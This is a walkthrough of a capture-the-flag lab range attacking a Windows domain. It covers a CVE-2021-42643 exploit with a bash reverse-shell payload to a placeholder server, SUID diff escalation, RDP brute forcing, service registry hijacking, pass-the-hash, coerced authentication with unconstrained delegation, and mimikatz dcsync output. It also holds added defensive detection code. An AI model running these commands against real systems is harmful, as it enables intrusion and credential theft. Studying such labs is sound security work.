• CVE-2021-42643
  • privilege escalation via diff
  • RDP brute force
  • registry privilege escalation
  • NTLM coerced authentication + unconstrained delegation

flag01

After obtaining the IP, browse to /admin.
It accepts the weak credentials admin/123456.
After logging in, check the version: this version is affected by CVE-2021-42643.

Capture the request and exploit it: write a reverse-shell payload into a PHP file. In the sid parameter, .._d_ stands for the parent directory, so the PHP file can be written into the web root.

POST /index.php?case=template&act=save&admin_dir=admin&site=default HTTP/1.1  
Host: 192.168.31.96
Content-Length: 57
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded;
Cookie: login_username=admin; login_password=357fce333f91905f3e7342d10e5a5ce4;
Connection: close

sid=#data_d_.._d_.._d_.._d_a.php&slen=693&scontent=<%3fphp+exec("/bin/bash+-c+'bash+-i+>%26+/dev/tcp/vpsip/9999+0>%261'")%3b%3f>

Send the request.

Browse to the file to trigger the command (start a listener on port 9999 on your server first).

Shell obtained.

Since the shell is not a privileged account, we need to escalate; look for SUID binaries that could be abused:

find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null

diff is among them and can be used to escalate.

Read flag01:

diff --line-format=%L /dev/null /home/flag/flag01.txt

This gives flag01 and a hint.
The hint mentions WIN19\Adrian and rockyou, which is presumably meant for RDP brute forcing.

flag02

Upload fscan and chisel.

Check the machine's internal IP.

Scan the internal network:

fscan -h 172.22.4.0/24

Internal network information:

172.22.4.7 DC01
172.22.4.19 FILESEVER
172.22.4.36
172.22.4.45 WIN19

Pivoting into the internal network

Start the listener on the server side.

Run the client command from the shell.

With the proxy in place, scanning the shell host's IP shows that port 3389 is open.

Brute force with hydra or crackmapexec (the domain\user value is quoted so the shell keeps the backslash):

proxychains4 hydra -l 'win19\Adrian' -P /usr/share/wordlists/rockyou.txt 172.22.4.45 rdp

proxychains crackmapexec smb 172.22.4.45 -u Adrian -p /usr/share/wordlists/rockyou.txt -d WIN19

This yields the credentials, but the password is reported as expired:
win19\Adrian babygirl1

Change the password remotely with smbpasswd, or log in as the user and change it directly. The host and user in the command below are placeholder values; substitute the target host and the expired account.

smbpasswd -r 10.0.0.15 -U 'expired'

Log in over remote desktop:

proxychains4 rdesktop 172.22.4.45 -r disk:share=/home/kali/Desktop/tmp

After logging in there is a PrivescCheck folder. PrivescCheck is a Windows privilege-escalation enumeration tool, and it had already been run; its HTML report shows a dangerous WSUS setting and a dangerous registry setting.

The user can modify the registry key of the service named gupdate.

Registry privilege escalation

First generate an executable with msfvenom.
It runs cmd as SYSTEM and executes the commands in the .bat file; msfvenom packages it as a service executable (-f exe-service), since it will be started as a service.

msfvenom -p windows/x64/exec cmd='C:\windows\system32\cmd.exe /c C:\users\Adrian\Desktop\nihao.bat ' --platform windows -f exe-service > nihao.exe

nihao.bat contains:

reg save hklm\system C:\Users\Adrian\Desktop\system
reg save hklm\sam C:\Users\Adrian\Desktop\sam
reg save hklm\security C:\Users\Adrian\Desktop\security

Registry modification command
Change the ImagePath value of the gupdate service key to the executable we generated:

reg add "HKLM\SYSTEM\CurrentControlSet\Services\gupdate" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\Adrian\Desktop\nihao.exe" /f

Start the gupdate service to trigger the executable:

sc start gupdate

Once triggered, the three files appear on the desktop.
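From the defender's side, the step above leaves a precise trace: a service ImagePath value rewritten to point at a binary under a user profile. The following is an added example, not code from the writeup, that runs that check over constructed Sysmon EventID 13 (registry value set) records; the field names follow Sysmon's schema and the sample records are made up.

```python
import re
from typing import Dict, List

# Constructed Sysmon EventID 13 (RegistryEvent: value set) records, reduced to
# the fields this check needs. Sample data, not telemetry from the range.
SAMPLE_EVENTS = [
    {"EventID": 13, "User": "WIN19\\Adrian",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\gupdate\ImagePath",
     "Details": r"C:\Users\Adrian\Desktop\nihao.exe"},
    {"EventID": 13, "User": "NT AUTHORITY\\SYSTEM",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\Spooler\ImagePath",
     "Details": r"%SystemRoot%\System32\spoolsv.exe"},
    {"EventID": 13, "User": "WIN19\\Adrian",
     "TargetObject": r"HKCU\Software\Example\Setting", "Details": "1"},
]

# Matches the ImagePath value of any service key (current or numbered control set).
SERVICE_IMAGEPATH = re.compile(
    r"^HKLM\\System\\(CurrentControlSet|ControlSet\d{3})\\Services\\([^\\]+)\\ImagePath$",
    re.IGNORECASE)

# Directories a standard user can normally write to; a service binary there is suspect.
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")


def is_user_writable_path(image_path: str) -> bool:
    # Drop surrounding quotes and expand the common %SystemRoot% form before comparing.
    p = image_path.strip().strip('"').lower().replace("%systemroot%", "c:\\windows")
    return p.startswith(USER_WRITABLE_PREFIXES)


def find_suspicious_imagepath_changes(events: List[Dict]) -> List[Dict]:
    """One alert per EventID 13 that rewrites a service ImagePath to a binary in a
    user-writable directory. The writing account is recorded: a non-SYSTEM writer
    is worth a second look, though it is also normal during software installs."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 13:
            continue
        m = SERVICE_IMAGEPATH.match(ev.get("TargetObject", ""))
        if not m or not is_user_writable_path(ev.get("Details", "")):
            continue
        alerts.append({"service": m.group(2), "user": ev.get("User", ""),
                       "image": ev["Details"]})
    return alerts


if __name__ == "__main__":
    for a in find_suspicious_imagepath_changes(SAMPLE_EVENTS):
        print(f"ALERT service={a['service']} set by {a['user']} -> {a['image']}")
```

The same rule maps onto Security Event 4657 or EDR registry telemetry; the fix on the host side is to remove write access for non-administrators on the service key.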

Decrypt them with secretsdump:

python secretsdump.py LOCAL -system system -sam sam -security security

This gives the administrator hash and the machine account hash.

Log in as administrator with the hash (pass-the-hash):

proxychains4  python3 psexec.py administrator@172.22.4.45 -hashes "aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab" -codec gbk

This gives control of the .45 host; read the flag.

flag03 + flag04

For convenience, add a local administrator account (the account created and the account added to the group must be the same name):

net user nihao nihao9! /add 
net localgroup administrators nihao /add

Connect over remote desktop.

Use BloodHound to enumerate the domain: both WIN19 and the DC have unconstrained delegation.
Unconstrained delegation: the service account is allowed to access other services as any user who has authenticated to it, because that user's TGT is forwarded to the host and cached there.

Run the collector to download the data first, then drag the output into BloodHound to view it. The machine account hash is the one decrypted from the three files above:

proxychains bloodhound-python -u 'win19$' --hashes "aad3b435b51404eeaad3b435b51404ee:bbd1d50b4689e93dc3b61babef482838" -d xiaorang.lab -dc dc01.xiaorang.lab -c all --dns-tcp -ns 172.22.4.7 --auth-method ntlm --zip
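The delegation finding comes down to one bit in userAccountControl, so it can be audited without BloodHound. This added example (not part of the writeup) builds the LDAP filter for that bit and evaluates constructed account records, flagging every non-DC holder of unconstrained delegation; it generalizes the page's computer-account case to user accounts as well. The account names echo the range, but the userAccountControl values are made up.

```python
from typing import Dict, List

# userAccountControl bits relevant to delegation (values from the AD schema).
SERVER_TRUST_ACCOUNT = 0x2000               # domain controller computer account
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
NOT_DELEGATED = 0x100000                    # "account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition

# LDAP_MATCHING_RULE_BIT_AND lets a filter test individual userAccountControl bits.
BIT_AND = "1.2.840.113556.1.4.803"


def unconstrained_delegation_filter() -> str:
    """LDAP filter for accounts with unconstrained delegation that are not DCs."""
    return (f"(&(userAccountControl:{BIT_AND}:={TRUSTED_FOR_DELEGATION})"
            f"(!(userAccountControl:{BIT_AND}:={SERVER_TRUST_ACCOUNT})))")


# Constructed sample of what such a query returns, reduced to two attributes.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "DC01$", "userAccountControl": 0x82000},       # DC: expected
    {"sAMAccountName": "WIN19$", "userAccountControl": 0x81000},      # member server: finding
    {"sAMAccountName": "FILESERVER$", "userAccountControl": 0x1000},  # no delegation
    {"sAMAccountName": "svc_web", "userAccountControl": 0x1080200},   # user account: finding
]


def unconstrained_delegation_findings(accounts: List[Dict]) -> List[Dict]:
    """Non-DC accounts with TRUSTED_FOR_DELEGATION set. Any such host caches the TGT
    of every principal that authenticates to it, which is what coercing the DC into
    authenticating relies on; DCs carry the flag by design and are skipped."""
    findings = []
    for acct in accounts:
        uac = acct["userAccountControl"]
        if uac & TRUSTED_FOR_DELEGATION and not uac & SERVER_TRUST_ACCOUNT:
            name = acct["sAMAccountName"]
            findings.append({"account": name,
                             "kind": "computer" if name.endswith("$") else "user"})
    return findings


def is_delegation_protected(uac: int) -> bool:
    """True if the account cannot be delegated: the flag to set on privileged accounts
    (membership in Protected Users has the same effect) so their TGTs are never forwarded."""
    return bool(uac & NOT_DELEGATED)
```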

Unconstrained delegation + NTLM coerced authentication against the DC

Use Rubeus to monitor for TGTs:

Rubeus.exe monitor /interval:1 /nowrap /targetuser:DC01$

If it reports that .NET 3.5 is missing, install it with the command below.
Installing .NET 3.5: download the sxs folder, then run:

dism.exe /online /enable-feature /featurename:NetFX3 /Source:D:\sxs

Coerced authentication
Use dfscoerce to coerce the domain controller into authenticating:

proxychains python3 dfscoerce.py -u "win19$" -hashes :bbd1d50b4689e93dc3b61babef482838 -d xiaorang.lab win19 172.22.4.7

Or PetitPotam:

proxychains python3 PetitPotam.py -u 'WIN19$' -hashes :2c05ad434d747b203a57565194891b38 -d xiaorang.lab -dc-ip 172.22.4.7 WIN19.xiaorang.lab DC01.xiaorang.lab

After the coerced authentication, Rubeus captures the domain controller's TGT:

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

Convert the base64 TGT into a ticket file:

echo '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' | base64 -d > DC01.kirbi

Use the ticket to dump the domain admin hash:

mimikatz.exe "kerberos::purge" "kerberos::ptt DC01.kirbi" "lsadump::dcsync /domain:xiaorang.lab /user:administrator" "exit"

mimikatz(commandline) # kerberos::purge
Ticket(s) purge for current session is OK

mimikatz(commandline) # kerberos::ptt DC01.kirbi

* File: 'DC01.kirbi': OK

mimikatz(commandline) # lsadump::dcsync /domain:xiaorang.lab /user:administrator
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] 'administrator' will be the user account

Object RDN : Administrator

** SAM ACCOUNT **

SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration : 1601/1/1 8:00:00
Password last change : 2025/2/18 17:28:57
Object Security ID : S-1-5-21-1913786442-1328635469-1954894845-500
Object Relative ID : 500

Credentials:
Hash NTLM: 4889f6553239ace1f7c47fa2c619c252
ntlm- 0: 4889f6553239ace1f7c47fa2c619c252
ntlm- 1: 4889f6553239ace1f7c47fa2c619c252
ntlm- 2: 4889f6553239ace1f7c47fa2c619c252
ntlm- 3: 4889f6553239ace1f7c47fa2c619c252
lm - 0: e2f976b4b93c8de94f7c7d26998bde3f
lm - 1: c79c7d92b2a21d11c240a59c9d1694b6
lm - 2: 87912010df4ce71b5a2bec799103a236

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 144f0dde1f001effdc2ae3dbfa27d316

* Primary:Kerberos-Newer-Keys *
Default Salt : XIAORANG.LABAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 23b87fd9c4a80c58fb0d71e2a0d5fc82b7de27156d039ad791093aa88ca95eb3
aes128_hmac (4096) : 3a4807b53f305c84603ff072655a5c42
des_cbc_md5 (4096) : 64feb058753bf1a2
OldCredentials
aes256_hmac (4096) : 23b87fd9c4a80c58fb0d71e2a0d5fc82b7de27156d039ad791093aa88ca95eb3
aes128_hmac (4096) : 3a4807b53f305c84603ff072655a5c42
des_cbc_md5 (4096) : 64feb058753bf1a2
OlderCredentials
aes256_hmac (4096) : 23b87fd9c4a80c58fb0d71e2a0d5fc82b7de27156d039ad791093aa88ca95eb3
aes128_hmac (4096) : 3a4807b53f305c84603ff072655a5c42
des_cbc_md5 (4096) : 64feb058753bf1a2

* Primary:Kerberos *
Default Salt : XIAORANG.LABAdministrator
Credentials
des_cbc_md5 : 64feb058753bf1a2
OldCredentials
des_cbc_md5 : 64feb058753bf1a2

* Packages *
NTLM-Strong-NTOWF

* Primary:WDigest *
01 1fd4772b6f3fea5f0a5a234dde150efb
02 70b5ab2d5931d45749e4f10b80a70466
03 0d71e6115a7e5850b3e4c777aba623df
04 1fd4772b6f3fea5f0a5a234dde150efb
05 354a5ce3ca3629c6ca77a73b462c0a7f
06 a692fc773761b7edf3a3cad332053a85
07 3b3bf4f20b86e7f890d2a6f748684c86
08 511be1f8053c22c147fe774e84f6cfa0
09 5cd37846466bba0ab01d0a4fb8fd421a
10 5c90774e68ba65b15563d817ea03be1d
11 1aa618d4990ce0b031f56c35b00ef135
12 511be1f8053c22c147fe774e84f6cfa0
13 385ea61fafea315b384cff461b9e114c
14 ee5a115e84919b46e718c6c4294dba78
15 729b4c3a8edab7f12e037ec161293f44
16 e3ff26cc0629c51fc68f18ce47173f45
17 bd6d0bafad3f99c28a9a18d9e5351763
18 359507105fa376c918a80f7fb982446a
19 20ad44fe17377c5f3815358c33ca7c34
20 330fb8b3848b024ba40a8cef987d6795
21 ec544c990f343fe338a4667f3791e5ab
22 d528c47b4f30acdeb5bf49f49fed7d64
23 41bb0903f6c2129f27bfa06e6d9b186b
24 b5c4fc8c656c14829c0da25e0852582a
25 8bba781aff9bb5e7939f73c216d0e750
26 d3bb8972f7c7ffbc5b22392125c4e21f
27 dd97e0d53b5d1ae346029810cf74d0b8
28 0c084ded5672573ee7c4127ab474f930
29 c922d791de366eedeb97c1bd0798d6ff


mimikatz(commandline) # exit
Bye!
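The dcsync output above is what a DC records as a replication request, and a replication request from anything other than a DC account is the detection. This added example (not from the writeup) checks constructed Security Event 4662 records for the replication extended rights and flags any requester outside the known DC accounts; the field names follow the Windows 4662 schema, the records are made up.

```python
import re
from typing import Dict, Iterable, List

# Extended-right GUIDs that DRS replication (and therefore DCSync) requests; from the AD schema.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"\{([0-9a-f-]{36})\}", re.IGNORECASE)

# Constructed Security log Event 4662 records, reduced to the fields used here.
SAMPLE_4662 = [
    {"SubjectUserName": "DC02$", "SubjectDomainName": "XIAORANG",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "Administrator", "SubjectDomainName": "XIAORANG",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "WIN19$", "SubjectDomainName": "XIAORANG",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},  # unrelated object access
]


def dcsync_alerts(events: Iterable[Dict], dc_accounts: Iterable[str]) -> List[Dict]:
    """Flag 4662 events that request replication rights from any principal that is not
    a known DC computer account. A DC's own account replicating is normal; an admin user
    or a member server doing so is the ptt + dcsync step. Legitimate non-DC replicators
    (for example a directory-sync service account) go into dc_accounts as an allowlist."""
    allowed = {a.upper() for a in dc_accounts}
    alerts = []
    for ev in events:
        rights = [REPLICATION_RIGHTS[g.lower()]
                  for g in GUID_RE.findall(ev.get("Properties", ""))
                  if g.lower() in REPLICATION_RIGHTS]
        if not rights:
            continue
        subject = ev.get("SubjectUserName", "")
        if subject.upper() in allowed:
            continue
        alerts.append({"subject": f"{ev.get('SubjectDomainName', '')}\\{subject}",
                       "rights": rights})
    return alerts


if __name__ == "__main__":
    for a in dcsync_alerts(SAMPLE_4662, ["DC01$", "DC02$"]):
        print(f"ALERT replication rights requested by {a['subject']}: {', '.join(a['rights'])}")
```

The alert fires on the replication rights regardless of whether the ticket was obtained through delegation abuse or any other path, so it complements the delegation audit rather than depending on it.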

Lateral movement

Use the domain admin hash to log into another domain host and get flag03:

proxychains4 python3 wmiexec.py -hashes :4889f6553239ace1f7c47fa2c619c252 xiaorang.lab/Administrator@172.22.4.19 -codec gbk

Read the flag.

Log into the domain controller to get flag04:

proxychains python3 psexec.py -hashes :4889f6553239ace1f7c47fa2c619c252 Administrator@172.22.4.7

proxychains4 python3 wmiexec.py -hashes :4889f6553239ace1f7c47fa2c619c252 Administrator@172.22.4.7 -codec gbk

References

https://fushuling.com/index.php/2023/09/24/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83%C2%B7delegation/